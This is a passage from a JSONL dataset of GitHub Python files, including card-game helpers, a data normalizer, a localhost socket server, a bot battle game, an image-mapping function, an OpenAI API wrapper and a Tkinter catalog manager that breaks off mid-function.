x\n","repo_name":"goldiusleonard/skripsi","sub_path":"fas_simple_distill/data/transform/resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"14141413751","text":"\"\"\" A module to provide common methods required to define card games \"\"\"\n\nfrom cards import *\n\ndef reorderplayers(newfirst,listofplayers):\n\t\"\"\"Reorder the players in a list of players\"\"\"\n\tbefore = listofplayers[:int(newfirst.getid())]\n\tafter = listofplayers[int(newfirst.getid())+1:]\n\tlistofplayers = [newfirst] + after + before\n\treturn listofplayers\n\ndef setnames(players,hands):\n\t\"\"\"Set a name for each player in a list\"\"\"\n\tfor i in range(0,len(hands)):\n\t\tplayers.append(Player(int(i),str(input('Player '+str(i+1)+' please enter your name. 
')),hands[i],0))\n\treturn players\n\ndef orderbysuit(handcards,thenrank = False):\n\t\"\"\"Order the cards in a hand by suit, and then possibly by rank\"\"\"\n\tsuithands = []\n\tfor i in range(0,len(Deck.SUITS)):\n\t\ttemp = []\n\t\tfor card in handcards:\n\t\t\tif card.suit == Deck.SUITS[i]:\n\t\t\t\ttemp.append(card)\n\t\tsuithands.append(temp)\n\thandcards = []\n\tfor suithand in suithands:\n\t\tif thenrank:\n\t\t\tsuithand = orderbyrank(suithand)\n\t\tfor card in suithand:\n\t\t\thandcards.append(card)\n\treturn handcards\n\ndef orderbyrank(handcards,thensuit = False):\n\t\"\"\"Order the cards in a hand by rank, and then possibly by suit\"\"\"\n\trankhands = []\n\tfor i in range(0,len(Deck.RANKS)):\n\t\ttemp = []\n\t\tfor card in handcards:\n\t\t\tif card.rank == Deck.RANKS[i]:\n\t\t\t\ttemp.append(card)\n\t\trankhands.append(temp)\n\thandcards = []\n\tfor rankhand in rankhands:\n\t\tif thensuit:\n\t\t\t\trankhand = orderbysuit(rankhand)\n\t\tfor card in rankhand:\n\t\t\thandcards.append(card)\n\treturn handcards\n\t\ndef padding():\n\t\"\"\"Add blank space to the console\"\"\"\n\tfor j in range(0,50):\n\t\tprint(\"\\n\")\n\t\t\ndef displayhand(hand,title,empty_message):\n\t\"\"\"Display a hand of cards in a nicely formatted way\"\"\"\n\tprint(title)\n\tif str(hand) ==\"\":\n\t\tprint(empty_message)\n\telse:\n\t\toutstring = \"\"\n\t\tcurrentsplit = hand.splithand()\n\t\tfor textcard in range (0,len(currentsplit)):\n\t\t\toutstring += (str(textcard+1)+\": \"+currentsplit[textcard]+\" \")\n\t\tprint(outstring)\n\tprint('=======================================================================================')\n\t\ndef ordinal(i):\n\t\"\"\"Return the ordinal string (1st, 2nd, 3rd, ...) for a 0-based place index\"\"\"\n\tn = i + 1\n\tif 10 <= n % 100 <= 20:\n\t\tsuffix = 'th'\n\telse:\n\t\tsuffix = {1: 'st', 2: 'nd', 3: 'rd'}.get(n % 10, 'th')\n\treturn str(n) + suffix\n\t\ndef displayscores(players,highest_wins = True):\n\t\"\"\"Display the scores for each player and place them\"\"\"\n\tscore = []\n\tnames = []\n\n\tfor player in players:\n\t\tscore.append(player.score)\n\t\tnames.append(player.name)\n\t\t\n\tscore,names = (list(t) for t in zip(*sorted(zip(score,names),reverse=highest_wins)))\n\n\tfor i in range(0,len(names)):\n\t\tprint(ordinal(i)+' place: '+names[i]+' with '+str(score[i])+' points')\n\t","repo_name":"samrbutler/PythonCards","sub_path":"methods.py","file_name":"methods.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31311756379","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 2 11:44:11 2020\n\n@author: suryanshshukla\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport stat \nimport math\nX = np.array([1,2,3,1112,11,12,12,13,13,144,1231,1321.1231,12,14,15,98,102,2,178])\n\ndef CalMean(a):\n Summation = sum(a)\n n = len(a)\n result = Summation/n\n return result\n\nmu = CalMean(X)\n\ndef Variance(a):\n Ex2 = np.array([])\n for i in a:\n Ex2 = np.append(Ex2,i*i)\n n = len(Ex2)\n result = sum(Ex2)/n - CalMean(a)**2\n return result \n\n\n# Z = (X - mu) / sigma\n\ndef SD(a):\n var = Variance(a)\n result = math.sqrt(var)\n return result \n\ndef normalize(a):\n Xmax = max(a)\n Xmin = min(a)\n norZ = np.array([])\n p = Xmax - Xmin\n for x in a: \n y = (x - Xmin)/p\n norZ = np.append(norZ, y)\n return norZ\n\n\n\nf, (ax1,ax2) = plt.subplots(1,2)\n\nax1.plot(X)\nax2.plot(normalize(X))\n\nplt.show()\nprint(\"Complete\")","repo_name":"suryanshshukla10/Projects","sub_path":"normalize-data/normalize_data.py","file_name":"normalize_data.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30802493651","text":"import socketserver\n\nclass MyServer(socketserver.BaseRequestHandler):\n def handle(self):\n conn = self.request\n print(self.client_address)\n\n\nif __name__ == \"__main__\":\n server = socketserver.ThreadingTCPServer(('127.0.0.1',8091),MyServer)\n server.serve_forever()\n","repo_name":"yuniaohappy/LearningPython","sub_path":"python_full/day27/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3081462702","text":"# Welcome to Weber's Battle of the Bots!\n\n# Create a simple robot battle game between two robots. Both bots start out with 100 life points. Every time the bots battle, the strength is based off a random number. You can decide how to set the algorithm for strength. The bot with the most strength wins and the other bot loses life points (once again, you can decide the algorithm for how much life points they lose).\n\n# This will be an Object-Oriented Program so you will create a botPlayer class and instantiate two objects of that class for each robot. Some instance attributes about the class include...\n\n# life points\n# strength\n# generator for a random number\n# init\n\n# A default to set the life points and strength\n# Behaviors could include...\n\n# set Strength\n# receive damage\n# You will need to access...\n\n# strength\n# life points\n\nimport random\n\nclass botPlayer:\n def __init__(self):\n self.health = 100\n self.strength = 0\n self.turn = 0\n\n def setStrength(self):\n self.strength = random.randint(1, 26)\n\n def receiveDamage(self, damage):\n self.health -= damage\n\n def changeTurn(self):\n self.turn += 1\n\nclass botGame:\n bot1 = botPlayer()\n bot2 = botPlayer()\n\n while True:\n print(f\"Bot1 Life Points: {bot1.health}\")\n print(f\"Bot2 Life Points: {bot2.health}\")\n\n if bot1.turn % 2 == 0 :\n print(\"Bot1 Your Turn!\")\n else:\n print(\"Bot2 Your Turn!\")\n\n choice = input(\"Press h to hit, q to quit: \")\n\n if choice != \"h\":\n break\n\n bot1.setStrength()\n bot2.setStrength()\n\n print(f\"Bot1 strength: {bot1.strength}, Bot2 strength: {bot2.strength}.\")\n if bot1.strength > bot2.strength:\n damage = int(bot1.strength - bot2.strength)\n bot2.receiveDamage(damage)\n print(f\"Bot2 has {damage} points of damage.\")\n elif bot1.strength < bot2.strength:\n damage = int(bot2.strength - bot1.strength)\n bot1.receiveDamage(damage)\n print(f\"Bot1 has {damage} points of damage.\")\n else:\n print(\"It was a tie\")\n\n bot1.changeTurn()\n\n if bot1.health <= 0 or bot2.health <= 0:\n break\n\n\n print(\"Nice battle!\")\n if bot1.health > bot2.health:\n print(\"Bot1 wins this round!\")\n elif bot1.health < bot2.health:\n print(\"Bot2 wins this round!\")\n else:\n print(\"Tie!\")\n print(\"Thanks for playing!\")","repo_name":"Vitamin-Ccc/python","sub_path":"Module7/BattleofBots.py","file_name":"BattleofBots.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21009529813","text":"def map_rotation_scale(src, rotation=0, scale=[1, 1]):\r\n import numpy\r\n import math\r\n from math import cos, sin\r\n from numpy import linspace, transpose, ones\r\n # we need to create the 3x3 linear system to operate upon this homogenous array from start to finish, which will\r\n # contain both the scaling factor and the rotating factor.\r\n\r\n # create scaling matrix\r\n scaling_matrix = [(1 / scale[1]), 0, 0, 
0, (1 / scale[0]), 0, 0, 0, 1]\r\n scaling_matrix = numpy.asarray(scaling_matrix)\r\n scaling_matrix = scaling_matrix.reshape((3, 3))\r\n\r\n # create rotation matrix\r\n rotation_matrix = [cos(math.radians(rotation)), sin(math.radians(rotation)), 0, -sin(math.radians(rotation)),\r\n cos(math.radians(rotation)), 0, 0, 0, 1]\r\n rotation_matrix = numpy.asarray(rotation_matrix)\r\n rotation_matrix = rotation_matrix.reshape((3, 3))\r\n\r\n coordinate_matrix = numpy.matmul(rotation_matrix, scaling_matrix)\r\n\r\n # MATRIX IS CREATED, BUILD THE NEW ARRAY HERE\r\n imshape_src = src.shape\r\n coordinates = ((0, 0, 1), (0, imshape_src[1], 1), (imshape_src[0], 0, 1), (imshape_src[0], imshape_src[1], 1))\r\n coordinates = transpose(numpy.array(coordinates))\r\n map_corners = numpy.dot(numpy.linalg.inv(coordinate_matrix), coordinates)\r\n\r\n map_length = round(max(map_corners[0, :]) - min(map_corners[0, :]))\r\n map_height = round(max(map_corners[1, :]) - min(map_corners[1, :]))\r\n imshape = (map_length, map_height)\r\n\r\n # Create list of indices\r\n rows = linspace(0, imshape[0] - 1, imshape[0]).astype(int)\r\n columns = transpose(linspace(0, imshape[1] - 1, imshape[1]).astype(int))\r\n\r\n # now, create an array of every possible index in source image.\r\n indices_array = numpy.zeros([map_length, map_height])\r\n indices_array = transpose(numpy.reshape(indices_array, [1, int(indices_array.size)]).astype(int))\r\n indices_array = numpy.hstack((indices_array, indices_array))\r\n count = 0\r\n for i in range(0, imshape[0]):\r\n for j in range(0, imshape[1]):\r\n indices_array[count, 1] = columns[j]\r\n indices_array[count, 0] = rows[i]\r\n count = count + 1\r\n\r\n # append array of ones to indices array to create homogenous array\r\n ones_array = ones(indices_array.shape[0])\r\n homogenous_array = numpy.vstack((indices_array[:, 0], indices_array[:, 1], ones_array))\r\n\r\n # we are ready to apply this transform. 
Let's shift the coordinate system such that 0,0 is about the center.\r\n\r\n homogenous_array[0, :] = homogenous_array[0, :] - (imshape[0] / 2)\r\n homogenous_array[1, :] = homogenous_array[1, :] - (imshape[1] / 2)\r\n\r\n # Take the dot product of these matrices\r\n prime_array = numpy.dot(coordinate_matrix, homogenous_array)\r\n\r\n # now to shift back to upper left corner of image being (0,0)\r\n prime_array[0, :] = prime_array[0, :] + (imshape_src[0] / 2)\r\n prime_array[1, :] = prime_array[1, :] + (imshape_src[1] / 2)\r\n\r\n xprime = prime_array[0, :]\r\n yprime = prime_array[1, :]\r\n\r\n # Now have to convert these 1xn arrays to their destination sizes desired.\r\n\r\n xprime = xprime.reshape(imshape[0], imshape[1]).astype(numpy.float32)\r\n yprime = yprime.reshape(imshape[0], imshape[1]).astype(numpy.float32)\r\n\r\n return yprime, xprime\r\n","repo_name":"ccalandra98/Project-Files","sub_path":"imgs362_python/ipcv/HW4Submit/map_rotation_scale.py","file_name":"map_rotation_scale.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37441757887","text":"import openai\nimport os\nfrom pprint import pprint\nfrom database.base import Database\nfrom database.conversation import Conversation\n\n\nclass OpenAIAPI:\n def __init__(self, api_key=None):\n self.api_key = api_key or os.getenv(\"OPENAI_API\")\n openai.api_key = self.api_key\n self.user_histories = {}\n\n def generate_response(self, model=\"gpt-3.5-turbo\", max_tokens=50, messages: list | None = None, temperature=0.7,\n stop=None):\n try:\n response = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=temperature,\n max_tokens=max_tokens,\n stream=True,\n stop=stop,\n )\n\n return response\n except Exception as e:\n pprint(f\"Error generating response: {e}\")\n return None\n\n def update_user_histories(self, telegram_id, user_message, bot_message):\n db = Conversation()\n db.add_conversation(telegram_id, \"user\", user_message)\n db.add_conversation(telegram_id, \"assistant\", bot_message)\n db.close()\n\n def reset_chat(self, telegram_id):\n db = Conversation()\n db.reset_conversations(telegram_id)\n db.close()\n","repo_name":"javoxirone/bilagon-ai-bot","sub_path":"gpt/gpt.py","file_name":"gpt.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"14291935385","text":"from tkinter import *\nfrom tkinter import messagebox, font, ttk, simpledialog, filedialog\nimport random\nfrom fpdf import FPDF\nfrom PIL import Image, ImageTk\nimport tkinter as tk\nimport os\n\n# Declare entry variables as global\nname_entry = None\nprice_entry = None\ndescription_entry = None\ncategory_var = None\ntable = None\nimage_preview = None\nimage_path = None\ncanvas = None\ncanvas_frame = None\ncurrent_info_window = None\n\n\ndef catalog_file_exists():\n return os.path.isfile(\"catalog_data.txt\")\n\ndef validate_float(value):\n try:\n if value:\n float(value)\n return True\n except ValueError:\n return False\n\n\ndef reset_frame():\n global frame_screen\n frame_screen.destroy() # Destroy the existing frame\n frame_screen = Frame(root, width=920, height=536, borderwidth=10, relief=\"flat\")\n frame_screen.place(x=360, y=184)\n\n\ndef add_item():\n global frame_screen, name_entry, price_entry, description_entry, category_var, image_preview, image_path\n\n reset_frame() # Reset the frame before creating new widgets\n 
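# lay out the Add Item form: entries for name, price and description, plus category, image and save controls\n 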
font.Font(size=20)\n\n delete_label = Label(frame_screen, text=\"Add Item\", font=(\"Helvetica\", 24))\n delete_label.place(x=100, y=30)\n entry_font = font.Font(size=20) # Set the desired font size\n name_label = Label(frame_screen, text=\"Name:\")\n\n name_label.place(x=100, y=80)\n name_entry = ttk.Entry(frame_screen, width=40, font=entry_font) # Set width to 70 characters\n name_entry.place(x=100, y=110, height=58) # Set height to 58 pixels\n\n price_label = Label(frame_screen, text=\"Price:\")\n price_label.place(x=100, y=180)\n price_entry = ttk.Entry(frame_screen, width=40, font=entry_font, validate=\"key\",\n validatecommand=(frame_screen.register(validate_float), '%P'))\n price_entry.place(x=100, y=208, height=58)\n\n description_label = Label(frame_screen, text=\"Description:\")\n description_label.place(x=100, y=276)\n description_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n description_entry.place(x=100, y=304, height=58)\n\n # Category dropdown using Menubutton\n category_label = Label(frame_screen, text=\"Category:\")\n category_label.place(x=100, y=372)\n\n categories = [\n \"None\",\n \"Makeup\",\n \"Fragrance\",\n \"Skincare\",\n \"Bath and Body\",\n \"Intimate Apparel\",\n \"Accessories\",\n \"Jewelry\",\n \"Men's Store\",\n \"Home & Kitchen\",\n \"Nutrition\",\n \"Other\"\n ]\n\n category_var = StringVar()\n category_var.set(categories[0]) # Set default category\n\n category_menu = Menubutton(frame_screen, textvariable=category_var, indicatoron=True, borderwidth=1,\n relief=\"raised\", width=30)\n category_menu.place(x=100, y=400, height=30)\n\n category_menu.menu = Menu(category_menu, tearoff=False)\n category_menu[\"menu\"] = category_menu.menu\n\n for category in categories:\n category_menu.menu.add_radiobutton(label=category, variable=category_var, value=category)\n\n # Image selection button\n image_button = ttk.Button(frame_screen, text=\"Select Image\", command=select_image)\n image_button.place(x=257, y=34, height=30)\n\n # Frame to hold the image preview with border\n image_preview_frame = ttk.Frame(frame_screen, border=2, relief=\"flat\")\n image_preview_frame.place(x=579, y=384, height=126, width=137)\n\n # Image preview label inside the frame\n image_preview = Label(image_preview_frame)\n image_preview.pack(padx=5, pady=5, fill='both', expand=True)\n\n # Save button\n save_button = ttk.Button(frame_screen, text=\"Save\", command=save_item)\n save_button.place(x=100, y=440, height=30)\n # Close button\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=480, height=30)\n\n\ndef select_image():\n global image_path, image_preview\n file_path = filedialog.askopenfilename(filetypes=[(\"Image files\", \"*.png;*.jpg;*.jpeg\")])\n if file_path:\n image_path = file_path\n update_image_preview()\n else:\n messagebox.showwarning(\"Warning\", \"No image selected.\")\n\n\ndef update_image_preview(image_preview_frame=None):\n global image_path, image_preview\n\n if image_path:\n # Open the image file and create a resized thumbnail\n img = Image.open(image_path)\n img.thumbnail((137, 137), Image.BICUBIC)\n photo = ImageTk.PhotoImage(img)\n\n # Update the image preview label\n if image_preview:\n image_preview.config(image=photo)\n image_preview.image = photo\n else:\n image_preview = Label(image_preview_frame, image=photo)\n image_preview.pack(padx=5, pady=5, fill='both', expand=True)\n image_preview.image = photo\n else:\n messagebox.showwarning(\"Warning\", \"No image selected.\")\n\n\ndef 
save_item():\n global name_entry, price_entry, description_entry, category_var, image_path\n item_name = name_entry.get().strip() # Remove leading and trailing spaces\n try:\n item_price = float(price_entry.get())\n except ValueError:\n messagebox.showerror(\"Error\", \"Please enter a valid numeric value for the price.\")\n return\n item_description = description_entry.get().strip() # Remove leading and trailing spaces\n item_category = category_var.get()\n\n # Check if no image is selected\n if image_path is None:\n messagebox.showerror(\"Error\", \"Please select an image.\")\n return\n\n # Check for empty fields, non-numeric price, category not selected\n if not (item_price is not None and isinstance(item_price, (int, float))) or item_category == \"None\":\n messagebox.showerror(\"Error\", \"Please fill in all fields correctly.\")\n return\n\n # Check if any of the fields contain only spaces\n if not (item_name and item_description and item_category):\n messagebox.showerror(\"Error\", \"Please fill in all fields correctly.\")\n return\n\n # Check if the item name already exists in the catalog\n if is_duplicate_name(item_name):\n messagebox.showerror(\"Error\", \"Item name already exists in the catalog. Please choose a different name.\")\n return\n\n # Replace \"|\" with \"\\\" in item_name and item_description\n item_name_cleaned = item_name.replace(\"|\", \"\\\\\")\n item_description_cleaned = item_description.replace(\"\\n\", \" \").replace(\"|\", \"\\\\\")\n item_id = generate_unique_id()\n # Use pipe \"|\" as a separator for the data\n data_to_write = f\"{item_id}|{item_name_cleaned}|{item_price}|{item_description_cleaned}|{item_category}|{image_path}\\n\"\n\n # Append the data to the file\n with open(\"catalog_data.txt\", \"a\") as file:\n file.write(data_to_write)\n\n messagebox.showinfo(\"Success\", f\"Item added successfully!\\nItem ID: {item_id}\")\n\n\n\ndef is_duplicate_name(new_name):\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n existing_names = [line.split(\"|\")[1].strip() for line in file if line.strip() and line.split(\"|\")]\n return new_name in existing_names\n except FileNotFoundError:\n return False\n\n\ndef generate_unique_id():\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n existing_ids = {int(line.split(\"|\")[0]) for line in file if line.strip() and line.split(\"|\")}\n except FileNotFoundError:\n existing_ids = set()\n\n # Generate a new ID until a unique one is found\n new_id = random.randint(1000, 9999)\n while new_id in existing_ids:\n new_id = random.randint(1000, 9999)\n\n return new_id\n\n\ndef delete():\n global frame_screen\n reset_frame() # Reset the frame before creating new widgets\n if not catalog_file_exists():\n messagebox.showerror(\"Error\", \"Catalog file does not exist. Please add some item first.\")\n return\n # Check if there is data in the file\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n first_line = file.readline()\n if not first_line.strip():\n # File is empty, show a message and return\n messagebox.showinfo(\"Info\", \"Catalog file is empty. 
Please add some items.\")\n return\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n return\n except Exception as e:\n messagebox.showerror(\"Error\", f\"An error occurred: {str(e)}\")\n return\n # Create UI for deleting an item\n entry_font = font.Font(size=20) # Set the desired font size\n\n delete_label = Label(frame_screen, text=\"Delete Item\", font=(\"Helvetica\", 24))\n delete_label.place(x=100, y=30)\n\n item_id_label = Label(frame_screen, text=\"Enter Item ID to delete:\")\n item_id_label.place(x=100, y=90)\n\n item_id_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n item_id_entry.place(x=100, y=120, height=58)\n\n delete_button = ttk.Button(frame_screen, text=\"Delete\", command=lambda: delete_item(item_id_entry.get()))\n delete_button.place(x=100, y=188, height=30)\n\n # Close button\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=228, height=30)\n\n\ndef delete_item(item_id_str):\n if item_id_str is None:\n return # Return to the main menu\n\n if not item_id_str.isdigit():\n messagebox.showerror(\"Error\", \"Please enter a valid number for the Item ID.\")\n return\n\n item_id = int(item_id_str)\n\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n lines = file.readlines()\n except FileNotFoundError:\n lines = []\n\n found = False\n updated_data = []\n for line in lines:\n if line.startswith(str(item_id)):\n found = True\n else:\n updated_data.append(line)\n\n if found:\n with open(\"catalog_data.txt\", \"w\") as file:\n file.writelines(updated_data)\n\n messagebox.showinfo(\"Success\", f\"Item with Item ID {item_id} deleted successfully!\")\n else:\n messagebox.showerror(\"Error\", f\"No corresponding item found for Item ID: {item_id}\")\n\n\ndef update_item():\n global frame_screen\n\n reset_frame() # Reset the frame before creating new widgets\n if not catalog_file_exists():\n messagebox.showerror(\"Error\", \"Catalog file does not exist. Please add some item first\")\n return\n # Check if there is data in the file\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n first_line = file.readline()\n if not first_line.strip():\n # File is empty, show a message and return\n messagebox.showinfo(\"Info\", \"Catalog file is empty. 
Please add some items.\")\n return\n except FileNotFoundError:\n messagebox.showerror(\"Error\", \"Catalog data file not found.\")\n return\n except Exception as e:\n messagebox.showerror(\"Error\", f\"An error occurred: {str(e)}\")\n return\n entry_font = font.Font(size=20) # Set the desired font size\n\n update_label = Label(frame_screen, text=\"Update Item\", font=(\"Helvetica\", 24))\n update_label.place(x=100, y=30)\n\n item_id_label = Label(frame_screen, text=\"Enter Item ID to update:\")\n item_id_label.place(x=100, y=90)\n\n item_id_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n item_id_entry.place(x=100, y=120, height=58)\n\n update_button = ttk.Button(frame_screen, text=\"Update\", command=lambda: update_item_ui(item_id_entry.get()))\n update_button.place(x=100, y=188, height=30)\n\n # Close button\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=228, height=30)\n\n\ndef update_item_ui(item_id_str):\n global frame_screen\n if not item_id_str.isdigit():\n messagebox.showerror(\"Error\", \"Please enter a valid number for the Item ID.\")\n return\n\n item_id = int(item_id_str)\n\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n lines = file.readlines()\n except FileNotFoundError:\n lines = []\n\n found = False\n item_data = []\n for line in lines:\n if line.startswith(str(item_id)):\n found = True\n item_data = line.strip().split(\"|\")[1:6] # Extract name, price, description, category\n break\n\n if found:\n create_update_frame(item_id, item_data)\n else:\n messagebox.showerror(\"Error\", f\"No corresponding item found for Item ID: {item_id}\")\n\n\ndef create_update_frame(item_id, item_data):\n global frame_screen, image_path_entry, image_preview_label\n\n frame_screen.destroy() # Destroy the existing frame\n frame_screen = Frame(root, width=920, height=536, borderwidth=10, relief=\"flat\")\n frame_screen.place(x=360, y=184)\n entry_font = font.Font(size=20) # Set the desired font size\n\n name_label = Label(frame_screen, text=\"Name:\")\n name_label.place(x=100, y=30)\n name_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n name_entry.insert(0, item_data[0]) # Pre-fill with existing name\n name_entry.place(x=100, y=60, height=58)\n\n price_label = Label(frame_screen, text=\"Price:\")\n price_label.place(x=100, y=130)\n price_entry = ttk.Entry(frame_screen, width=40, font=entry_font, validate=\"key\",\n validatecommand=(frame_screen.register(validate_float), '%P'))\n price_entry.insert(0, item_data[1]) # Pre-fill with existing price\n price_entry.place(x=100, y=158, height=58)\n\n description_label = Label(frame_screen, text=\"Description:\")\n description_label.place(x=100, y=226)\n description_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n description_entry.insert(0, item_data[2]) # Pre-fill with existing description\n description_entry.place(x=100, y=254, height=58)\n\n category_label = Label(frame_screen, text=\"Category:\")\n category_label.place(x=100, y=322)\n categories = [\n \"Makeup\",\n \"Fragrance\",\n \"Skincare\",\n \"Bath and Body\",\n \"Intimate Apparel\",\n \"Accessories\",\n \"Jewelry\",\n \"Men's Store\",\n \"Home & Kitchen\",\n \"Nutrition\",\n \"Other\"\n ]\n category_var = StringVar()\n category_var.set(item_data[3].strip()) # Pre-select existing category\n\n category_dropdown = OptionMenu(frame_screen, category_var, *categories)\n category_dropdown.place(x=100, y=350, height=30, width=150)\n\n # Image Preview Label\n image_preview_label = 
Label(frame_screen, text=\"Image Preview:\")\n image_preview_label.place(x=260, y=322)\n\n # Entry for image path\n image_path_entry = ttk.Entry(frame_screen, width=40, font=entry_font)\n image_path_entry.insert(0, item_data[4] if len(item_data) > 4 else \"\") # Pre-fill with existing image path\n\n # Load and display the image preview\n update_image_preview1(item_data[4] if len(item_data) > 4 else \"\") # Initial image preview\n\n\n\n # Button for updating the image\n update_image_button = ttk.Button(frame_screen, text=\"Update Image\", command=update_image_path_button)\n update_image_button.place(x=100, y=400, height=30)\n\n # Save button\n save_button = ttk.Button(frame_screen, text=\"Save\",\n command=lambda: save_updated_item(item_id, name_entry.get(), price_entry.get(),\n description_entry.get(), category_var.get(),\n image_path_entry))\n save_button.place(x=100, y=440, height=30, width=83)\n # Close button\n close_button = ttk.Button(frame_screen, text=\"Close\", command=reset_frame)\n close_button.place(x=100, y=480, height=30, width=83)\n\n\ndef update_image_preview1(image_path):\n global frame_screen, image_preview_label\n\n # Destroy the existing image preview label\n if hasattr(image_preview_label, 'image_preview'):\n image_preview_label.image_preview.destroy()\n\n # Image Preview Label\n image_preview_label = Label(frame_screen, text=\"Image Preview:\")\n image_preview_label.place(x=260, y=322)\n\n # Load and display the new image preview\n img = Image.open(image_path)\n img.thumbnail((150, 150), Image.BICUBIC)\n preview_photo = ImageTk.PhotoImage(img)\n image_preview = Label(frame_screen, image=preview_photo)\n image_preview.photo = preview_photo\n image_preview.place(x=280, y=360,height=126, width=137)\n image_preview_label.image_preview = image_preview\n\n\ndef update_image_path_button():\n global image_path_entry\n\n # Use a file dialog to get the new image path from the user\n new_image_path = filedialog.askopenfilename(title=\"Select Image File\",\n filetypes=[(\"Image Files\", \"*.png;*.jpg;*.jpeg;*.gif\")])\n\n # Update the entry widget with the selected image path\n image_path_entry.delete(0, tk.END)\n image_path_entry.insert(0, new_image_path)\n\n update_image_preview1(new_image_path)\n\n\ndef update_image_path(item_id, new_image_path):\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n lines = file.readlines()\n except FileNotFoundError:\n lines = []\n\n updated_data = []\n for line in lines:\n if line.startswith(str(item_id)):\n # Update the image path\n updated_line = f\"{line.strip()}, {new_image_path}\\n\"\n updated_data.append(updated_line)\n else:\n updated_data.append(line)\n\n with open(\"catalog_data.txt\", \"w\") as file:\n file.writelines(updated_data)\n\n\ndef save_updated_item(item_id, new_name, new_price, new_description, new_category, image_path_entry):\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n lines = file.readlines()\n except FileNotFoundError:\n lines = []\n\n # Check for empty fields, non-numeric price, category not selected\n try:\n new_price = float(new_price)\n except ValueError:\n messagebox.showerror(\"Error\", \"Please enter a valid numeric value for the price.\")\n return\n\n if not new_price or not isinstance(new_price, (int, float)):\n messagebox.showerror(\"Error\", \"Please enter a valid numeric value for the price.\")\n return\n\n # Check if any of the fields contain only spaces\n if not (new_name.strip() and new_description.strip() and new_category.strip()):\n messagebox.showerror(\"Error\", \"Please fill in 
all fields correctly.\")\n return\n\n # Check if the item name already exists in the catalog, excluding the current item being updated\n if is_duplicate_name(new_name) and new_name != get_item_name_by_id(item_id):\n messagebox.showerror(\"Error\", \"Item name already exists in the catalog. Please choose a different name.\")\n return\n\n # Replace \"|\" with \"\\\" in item_name and item_description\n item_name_cleaned = new_name.replace(\"|\", \"\\\\\")\n item_description_cleaned = new_description.replace(\"\\n\", \" \").replace(\"|\", \"\\\\\")\n\n updated_data = []\n for line in lines:\n if line.startswith(str(item_id)):\n # Extract the existing image path\n existing_image_path = line.strip().split(\"|\")[5]\n\n # Check if the data is the same as existing data\n if (\n new_name == line.strip().split(\"|\")[1] and\n new_price == float(line.strip().split(\"|\")[2]) and\n new_description == line.strip().split(\"|\")[3] and\n new_category == line.strip().split(\"|\")[4] and\n image_path_entry.get() == existing_image_path\n ):\n messagebox.showinfo(\"Info\", \"No changes detected. Item not updated.\")\n reset_frame() # Close the update frame\n return\n\n # Update the name, price, category, and description if provided\n updated_line = (\n f\"{item_id}|{item_name_cleaned}|{new_price}|{item_description_cleaned}|{new_category}|{image_path_entry.get()}\\n\"\n )\n updated_data.append(updated_line)\n else:\n updated_data.append(line)\n\n with open(\"catalog_data.txt\", \"w\") as file:\n file.writelines(updated_data)\n\n messagebox.showinfo(\"Success\", f\"Item with Item ID {item_id} updated successfully!\")\n reset_frame() # Close the update frame\n\n\ndef get_item_name_by_id(item_id):\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n for line in file:\n data = line.strip().split(\"|\")\n if data[0] == str(item_id):\n return data[1]\n except FileNotFoundError:\n return None\n\n\ndef display_table():\n global table, category_var # Declare category_var as global\n # Reset the frame before creating new widgets\n reset_frame()\n if not catalog_file_exists():\n messagebox.showerror(\"Error\", \"Catalog file does not exist. Please add some item first\")\n return\n try:\n with open(\"catalog_data.txt\", \"r\") as file:\n first_line = file.readline()\n if not first_line.strip():\n # File is empty, show a message and return\n messagebox.showinfo(\"Info\", \"Catalog file is empty. 
